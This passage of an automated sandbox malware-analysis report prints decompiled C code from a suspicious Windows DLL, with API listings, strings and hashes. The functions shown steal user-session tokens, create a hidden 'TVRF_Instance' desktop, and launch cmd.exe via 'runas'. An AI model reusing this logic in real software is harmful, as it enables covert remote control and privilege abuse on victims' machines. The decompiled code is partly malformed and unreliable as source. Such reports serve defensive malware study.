						_t134 =  *_t191;
						if((_v32 & _t134) == 0) {
							goto L7;
						}
						_t161 = _v44;
						_push( &_v36);
						_v36 = _t185;
						_push(_t134);
						_push(_t161);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))() < 0 || _v48 != _t185) {
							_v48 = _t185;
							goto L10;
						} else {
							_v48 = 1;
						}
						L7:
						_t191 =  &(_t191[1]);
					} while (_t191 < "\"%s\" f");
					goto L10;
				}
			}






























































                                                                                                                        0x6f334765
                                                                                                                        0x6f33476f
                                                                                                                        0x6f33477d
                                                                                                                        0x6f334781
                                                                                                                        0x6f334785
                                                                                                                        0x6f334789
                                                                                                                        0x6f334791
                                                                                                                        0x6f3349fb
                                                                                                                        0x00000000
                                                                                                                        0x6f3349fb
                                                                                                                        0x6f334797
                                                                                                                        0x6f3347a1
                                                                                                                        0x6f3347a7
                                                                                                                        0x6f3347a8
                                                                                                                        0x6f3347b0
                                                                                                                        0x6f3347f5
                                                                                                                        0x6f3347f5
                                                                                                                        0x6f3347fd
                                                                                                                        0x6f334803
                                                                                                                        0x6f334804
                                                                                                                        0x6f33480c
                                                                                                                        0x6f3349e2
                                                                                                                        0x6f3349e2
                                                                                                                        0x6f3349ec
                                                                                                                        0x6f3349f9
                                                                                                                        0x6f334a04
                                                                                                                        0x6f334a04
                                                                                                                        0x00000000
                                                                                                                        0x6f3349f9
                                                                                                                        0x6f334816
                                                                                                                        0x6f33481f
                                                                                                                        0x6f334823
                                                                                                                        0x6f3349d6
                                                                                                                        0x6f3349d6
                                                                                                                        0x6f3349e0
                                                                                                                        0x00000000
                                                                                                                        0x6f3349e0
                                                                                                                        0x6f334830
                                                                                                                        0x6f334832
                                                                                                                        0x6f334836
                                                                                                                        0x6f3349cd
                                                                                                                        0x6f3349ce
                                                                                                                        0x6f3349d4
                                                                                                                        0x00000000
                                                                                                                        0x6f3349d4
                                                                                                                        0x6f33483c
                                                                                                                        0x6f334844
                                                                                                                        0x6f334845
                                                                                                                        0x6f33484b
                                                                                                                        0x6f33484c
                                                                                                                        0x6f334854
                                                                                                                        0x6f3348e5
                                                                                                                        0x6f3348e9
                                                                                                                        0x6f3348ef
                                                                                                                        0x6f334901
                                                                                                                        0x6f334905
                                                                                                                        0x6f33490d
                                                                                                                        0x6f334913
                                                                                                                        0x6f334919
                                                                                                                        0x6f33491e
                                                                                                                        0x6f33491e
                                                                                                                        0x6f334920
                                                                                                                        0x6f33492b
                                                                                                                        0x6f33492d
                                                                                                                        0x6f334938
                                                                                                                        0x6f33493c
                                                                                                                        0x6f33493e
                                                                                                                        0x6f334949
                                                                                                                        0x6f334949
                                                                                                                        0x6f33494b
                                                                                                                        0x6f33495a
                                                                                                                        0x6f33495c
                                                                                                                        0x6f33496e
                                                                                                                        0x6f334970
                                                                                                                        0x6f33497f
                                                                                                                        0x6f334981
                                                                                                                        0x6f334990
                                                                                                                        0x6f334992
                                                                                                                        0x6f33499c
                                                                                                                        0x6f33499d
                                                                                                                        0x6f3349a5
                                                                                                                        0x6f3349a7
                                                                                                                        0x6f3349a7
                                                                                                                        0x6f3349af
                                                                                                                        0x6f3349b9
                                                                                                                        0x6f3349bd
                                                                                                                        0x6f3349c0
                                                                                                                        0x6f3349c0
                                                                                                                        0x6f3349bd
                                                                                                                        0x6f33490d
                                                                                                                        0x6f3349c6
                                                                                                                        0x6f3349c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3349c7
                                                                                                                        0x6f33485a
                                                                                                                        0x6f334862
                                                                                                                        0x6f33486d
                                                                                                                        0x6f334875
                                                                                                                        0x6f33487b
                                                                                                                        0x6f334881
                                                                                                                        0x6f334885
                                                                                                                        0x6f334887
                                                                                                                        0x6f33488f
                                                                                                                        0x6f33489d
                                                                                                                        0x6f3348a4
                                                                                                                        0x6f3348a6
                                                                                                                        0x6f3348b5
                                                                                                                        0x6f3348b5
                                                                                                                        0x6f3348a4
                                                                                                                        0x6f3348b7
                                                                                                                        0x6f3348b7
                                                                                                                        0x6f3348bf
                                                                                                                        0x6f3348c9
                                                                                                                        0x6f3348d0
                                                                                                                        0x6f334a07
                                                                                                                        0x6f334a09
                                                                                                                        0x6f334a14
                                                                                                                        0x6f334a14
                                                                                                                        0x00000000
                                                                                                                        0x6f3348d6
                                                                                                                        0x6f3348d6
                                                                                                                        0x6f3348e1
                                                                                                                        0x6f3348e3
                                                                                                                        0x00000000
                                                                                                                        0x6f3348e3
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b2
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347b7
                                                                                                                        0x6f3347bd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3347bf
                                                                                                                        0x6f3347c7
                                                                                                                        0x6f3347c8
                                                                                                                        0x6f3347ce
                                                                                                                        0x6f3347d2
                                                                                                                        0x6f3347d7
                                                                                                                        0x6f3347f1
                                                                                                                        0x00000000
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e0
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e4
                                                                                                                        0x6f3347e7
                                                                                                                        0x00000000
                                                                                                                        0x6f3347b7

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0BC,00000000,00000001,6F33E07C,?), ref: 6F334789
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33481D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33482E
                                                                                                                        • lstrcmpiW.KERNEL32(00000000,?), ref: 6F334875
                                                                                                                        • CoCreateInstance.OLE32(6F33E09C,00000000,00000001,6F33E06C,?), ref: 6F334905
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33491C
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C0
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C7
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                                        • String ID: "%s" f
                                                                                                                        • API String ID: 1501015606-2173819097
                                                                                                                        • Opcode ID: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction ID: c32771a2695a69ceee25197c93ab087ed40e667b8df5f0d45bdcb0e6e172035b
                                                                                                                        • Opcode Fuzzy Hash: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction Fuzzy Hash: A9911576A047529FC200DF69C880D5BB7E9BFC9704F104A4DF5958B264DB32E846CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335060, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 69threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E6F335060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v256;
				char _v264;
				intOrPtr _t11;
				intOrPtr _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t23;
				char* _t24;
				void* _t29;

				_t24 =  &_v264;
				_t18 = _a12;
				_t22 = _a8;
				_t21 = 0;
				if(_t22 != 0 || _t18 != 0) {
					_t29 = M6F34050C - _t21; // 0x0
					if(_t29 != 0) {
						E6F333700("USBManager", 0);
						_t24 =  &(_t24[8]);
					}
					if(_t22 == 0) {
						if(_t18 == 0) {
							goto L8;
						}
						goto L9;
					} else {
						_t11 = M6F34057C; // 0x784250
						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
						_t23 = OpenEventA(2, 0,  &_v256);
						if(_t23 == 0) {
							goto L10;
						} else {
							SetEvent(_t23);
							CloseHandle(_t23);
							return _t21;
						}
					}
				} else {
					L8:
					_push(0);
					_t21 = E6F334FE0(_a4);
					L9:
					CloseHandle(CreateThread(0, 0, 0x6f332d50, 0, 0, 0));
					L10:
					return _t21;
				}
			}












                                                                                                                        0x6f335060
                                                                                                                        0x6f335067
                                                                                                                        0x6f33506f
                                                                                                                        0x6f335077
                                                                                                                        0x6f33507b
                                                                                                                        0x6f335081
                                                                                                                        0x6f335087
                                                                                                                        0x6f335090
                                                                                                                        0x6f335095
                                                                                                                        0x6f335095
                                                                                                                        0x6f33509a
                                                                                                                        0x6f3350ed
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33509c
                                                                                                                        0x6f33509c
                                                                                                                        0x6f3350b3
                                                                                                                        0x6f3350cb
                                                                                                                        0x6f3350cf
                                                                                                                        0x00000000
                                                                                                                        0x6f3350d1
                                                                                                                        0x6f3350d2
                                                                                                                        0x6f3350d9
                                                                                                                        0x6f3350ea
                                                                                                                        0x6f3350ea
                                                                                                                        0x6f3350cf
                                                                                                                        0x6f3350ef
                                                                                                                        0x6f3350ef
                                                                                                                        0x6f3350f6
                                                                                                                        0x6f335101
                                                                                                                        0x6f335103
                                                                                                                        0x6f335119
                                                                                                                        0x6f33511f
                                                                                                                        0x6f33512a
                                                                                                                        0x6f33512a

                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F3350B3
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3350C5
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3350D2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3350D9
                                                                                                                        • CreateThread.KERNEL32 ref: 6F335112
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335119
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                                        • String ID: %s%s%c$Global\$PBx$USBManager
                                                                                                                        • API String ID: 1587369599-1791046797
                                                                                                                        • Opcode ID: 85c7e7e6991666bc77e4d26e67e258fd71924913f5b5bcfb6734b0244e8a529b
                                                                                                                        • Instruction ID: f0e2f0cd991706fad068346b22cdb43a5c9a7f315d357111f002c1193962111e
                                                                                                                        • Opcode Fuzzy Hash: 85c7e7e6991666bc77e4d26e67e258fd71924913f5b5bcfb6734b0244e8a529b
                                                                                                                        • Instruction Fuzzy Hash: A9113D77F44BA12BE670E6599C46FDA331DEB85B22F004028FF549A280CA66F41947F5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3334B0, Relevance: 16.6, APIs: 11, Instructions: 134sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F3334B0() {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t65;

				_t59 =  *(_t65 + 0x20);
				 *(_t65 + 0x10) = 0;
				_t64 = 0;
				do {
					 *(_t65 + 0x20) = 0;
					 *(_t65 + 0x14) = 0;
					if(_t59 != 0xffffffff) {
						_push(_t65 + 0x14);
						_t32 = _t65 + 0x24;
						_push(_t32);
						_push(8);
						_push(_t59);
						_push(0);
						L6F33C36C();
						if(_t32 == 0) {
							goto L14;
						} else {
							_t35 =  *(_t65 + 0x20);
							if( *_t35 == 0) {
								 *(_t65 + 0x10) = 1;
							}
							_push(_t35);
							goto L13;
						}
					} else {
						_t33 = _t65 + 0x14;
						_push(_t33);
						_push(_t65 + 0x24);
						_push(1);
						_push(0);
						_push(0);
						L6F33C372();
						if(_t33 == 0) {
							goto L14;
						} else {
							_t55 =  *(_t65 + 0x14);
							_t61 =  *(_t65 + 0x20);
							_t53 = 0;
							_t35 = _t61;
							if(_t55 <= 0) {
								L8:
								_push(_t61);
							} else {
								while( *((intOrPtr*)(_t35 + 8)) != 0) {
									_t53 = _t53 + 1;
									_t35 = _t35 + 0xc;
									if(_t53 < _t55) {
										continue;
									} else {
										_push(_t61);
									}
									goto L13;
								}
								_t59 =  *_t35;
								 *(_t65 + 0x10) = 1;
								goto L8;
							}
							L13:
							L6F33C366();
							if( *(_t65 + 0x10) != 0) {
								_push(_t65 + 0x14);
								_push(_t59);
								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
								L6F33C360();
								if(_t35 == 0) {
									break;
								} else {
									 *((intOrPtr*)(_t65 + 0x38)) = 0;
									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
										break;
									} else {
										_push(4);
										_push(_t65 + 0x14);
										 *(_t65 + 0x20) = 0;
										L6F33C2EE();
										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
											CloseHandle( *(_t65 + 0x20));
											CloseHandle( *(_t65 + 0x14));
											return  *(_t65 + 0x10);
										} else {
											_t58 =  *(_t65 + 0x20);
											 *(_t65 + 0x14) = _t58;
											CloseHandle( *(_t65 + 0x14));
											return _t58;
										}
									}
								}
							} else {
								goto L14;
							}
						}
					}
					L21:
					L14:
					Sleep(0x1f4);
					_t64 = _t64 + 1;
				} while (_t64 < 0x78);
				return 0;
				goto L21;
			}













                                                                                                                        0x6f3334b9
                                                                                                                        0x6f3334bd
                                                                                                                        0x6f3334c1
                                                                                                                        0x6f3334c3
                                                                                                                        0x6f3334c3
                                                                                                                        0x6f3334c7
                                                                                                                        0x6f3334ce
                                                                                                                        0x6f333518
                                                                                                                        0x6f333519
                                                                                                                        0x6f33351d
                                                                                                                        0x6f33351e
                                                                                                                        0x6f333520
                                                                                                                        0x6f333521
                                                                                                                        0x6f333522
                                                                                                                        0x6f333529
                                                                                                                        0x00000000
                                                                                                                        0x6f33352b
                                                                                                                        0x6f33352b
                                                                                                                        0x6f333531
                                                                                                                        0x6f333533
                                                                                                                        0x6f333533
                                                                                                                        0x6f33353b
                                                                                                                        0x00000000
                                                                                                                        0x6f33353b
                                                                                                                        0x6f3334d0
                                                                                                                        0x6f3334d0
                                                                                                                        0x6f3334d4
                                                                                                                        0x6f3334d9
                                                                                                                        0x6f3334da
                                                                                                                        0x6f3334dc
                                                                                                                        0x6f3334dd
                                                                                                                        0x6f3334de
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f3334e7
                                                                                                                        0x6f3334e7
                                                                                                                        0x6f3334eb
                                                                                                                        0x6f3334ef
                                                                                                                        0x6f3334f1
                                                                                                                        0x6f3334f5
                                                                                                                        0x6f333511
                                                                                                                        0x6f333511
                                                                                                                        0x6f3334f7
                                                                                                                        0x6f3334f7
                                                                                                                        0x6f3334fc
                                                                                                                        0x6f3334fd
                                                                                                                        0x6f333502
                                                                                                                        0x00000000
                                                                                                                        0x6f333504
                                                                                                                        0x6f333504
                                                                                                                        0x6f333504
                                                                                                                        0x00000000
                                                                                                                        0x6f333502
                                                                                                                        0x6f333507
                                                                                                                        0x6f333509
                                                                                                                        0x00000000
                                                                                                                        0x6f333509
                                                                                                                        0x6f33353c
                                                                                                                        0x6f33353c
                                                                                                                        0x6f333545
                                                                                                                        0x6f33356a
                                                                                                                        0x6f33356b
                                                                                                                        0x6f33356c
                                                                                                                        0x6f333570
                                                                                                                        0x6f333577
                                                                                                                        0x00000000
                                                                                                                        0x6f333579
                                                                                                                        0x6f33358d
                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x6f33359b
                                                                                                                        0x6f33359b
                                                                                                                        0x6f3335a1
                                                                                                                        0x6f3335a2
                                                                                                                        0x6f3335a6
                                                                                                                        0x6f3335cc
                                                                                                                        0x6f3335ee
                                                                                                                        0x6f3335f9
                                                                                                                        0x6f333604
                                                                                                                        0x6f3335ce
                                                                                                                        0x6f3335ce
                                                                                                                        0x6f3335d7
                                                                                                                        0x6f3335dd
                                                                                                                        0x6f3335e8
                                                                                                                        0x6f3335e8
                                                                                                                        0x6f3335cc
                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333545
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f333547
                                                                                                                        0x6f33354c
                                                                                                                        0x6f333552
                                                                                                                        0x6f333553
                                                                                                                        0x6f333565
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                        • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333522
                                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333570
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74784F20), ref: 6F333591
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 6F3335A6
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,00000000,74784F20), ref: 6F3335BE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335DD
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335EE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 935900411-0
                                                                                                                        • Opcode ID: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction ID: 61162ad227356fac011b255bfeb04e741221c3df9ebe60a7c4868b1a3e237806
                                                                                                                        • Opcode Fuzzy Hash: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction Fuzzy Hash: A3418372A083959BE700DF55D881E6BB3E9FFC4B14F004A2EF58597180D775E908CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339C50, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F339C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t5;
				void* _t15;
				char _t21;
				struct HWND__* _t26;

				_t5 = _a8;
				if(_t5 == 0) {
					_t26 = _a4;
					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
					BringWindowToTop(_t26);
					SetForegroundWindow(_t26);
					SendMessageA(_t26, 0x473, 1, 1);
					SendMessageA(_t26, 0x46f, 8, 0);
					goto L7;
				} else {
					_t15 = _t5 - 2;
					if(_t15 == 0) {
						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						_push(0);
						_push(0);
						_push(0);
						if(E6F334230("runas", "cmd.exe", _t21) != 0) {
							goto L7;
						} else {
							return 1;
						}
					} else {
						if(_t15 != 0x83f0) {
							L7:
							return 0;
						} else {
							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
							return 0;
						}
					}
				}
			}







                                                                                                                        0x6f339c54
                                                                                                                        0x6f339c57
                                                                                                                        0x6f339ca3
                                                                                                                        0x6f339cb8
                                                                                                                        0x6f339ccb
                                                                                                                        0x6f339cd2
                                                                                                                        0x6f339cd9
                                                                                                                        0x6f339cef
                                                                                                                        0x6f339cfb
                                                                                                                        0x00000000
                                                                                                                        0x6f339c59
                                                                                                                        0x6f339c59
                                                                                                                        0x6f339c5c
                                                                                                                        0x6f339c77
                                                                                                                        0x6f339c7d
                                                                                                                        0x6f339c7f
                                                                                                                        0x6f339c81
                                                                                                                        0x6f339c98
                                                                                                                        0x00000000
                                                                                                                        0x6f339c9a
                                                                                                                        0x6f339c9f
                                                                                                                        0x6f339c9f
                                                                                                                        0x6f339c5e
                                                                                                                        0x6f339c63
                                                                                                                        0x6f339cff
                                                                                                                        0x6f339d01
                                                                                                                        0x6f339c69
                                                                                                                        0x6f339c6d
                                                                                                                        0x6f339c74
                                                                                                                        0x6f339c74
                                                                                                                        0x6f339c63
                                                                                                                        0x6f339c5c

                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32 ref: 6F339CAB
                                                                                                                        • SetWindowLongA.USER32 ref: 6F339CB8
                                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CCB
                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 6F339CD2
                                                                                                                        • SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CD9
                                                                                                                        • SendMessageA.USER32(00000000,00000473,00000001,00000001), ref: 6F339CEF
                                                                                                                        • SendMessageA.USER32(00000000,0000046F,00000008,00000000), ref: 6F339CFB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                                        • String ID: cmd.exe$runas
                                                                                                                        • API String ID: 4108379202-3213582026
                                                                                                                        • Opcode ID: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction ID: b32eff405f08732c2e7ed454381ec473309fef06366ecf7992b5a1978658f110
                                                                                                                        • Opcode Fuzzy Hash: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction Fuzzy Hash: 4211C8337456A877E621DA28CC06F8A366EEB82B31F104218F751EA0C4CBB56510C769
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339BD0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40threadsleepsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F339BD0(void* _a4) {
				struct HDESK__* _t3;
				struct HDESK__* _t9;
				void* _t11;

				_t3 = GetThreadDesktop(GetCurrentThreadId());
				 *0x6f340484 = _t3;
				if(_t3 != 0) {
					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
					 *0x6f340480 = _t3;
					if(_t3 != 0) {
						_t11 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
						if(_t11 != 0) {
							WaitForSingleObject(_t11, 0xffffffff);
							CloseHandle(_t11);
							Sleep(0xfa0);
						}
						_t9 =  *0x6f340480; // 0x0
						return CloseDesktop(_t9);
					}
				}
				return _t3;
			}






                                                                                                                        0x6f339bd7
                                                                                                                        0x6f339bdd
                                                                                                                        0x6f339be4
                                                                                                                        0x6f339bf8
                                                                                                                        0x6f339bfe
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c20
                                                                                                                        0x6f339c24
                                                                                                                        0x6f339c29
                                                                                                                        0x6f339c30
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c41
                                                                                                                        0x00000000
                                                                                                                        0x6f339c4e
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c4f

                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F339BD0
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339BD7
                                                                                                                        • CreateDesktopA.USER32 ref: 6F339BF8
                                                                                                                        • CreateThread.KERNEL32 ref: 6F339C1A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6F339C29
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F339C30
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6F339C3B
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339C48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 4135746217-3589830093
                                                                                                                        • Opcode ID: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction ID: 3b1c4acbcab4871b2534a89a24d0069648c58b50cac7b3d4e0e0623ae70a3b4e
                                                                                                                        • Opcode Fuzzy Hash: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction Fuzzy Hash: 2BF03177A41EA6EBEA71EB608C49F55366EAB06731F100108F611A52C4CF70E4209A18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

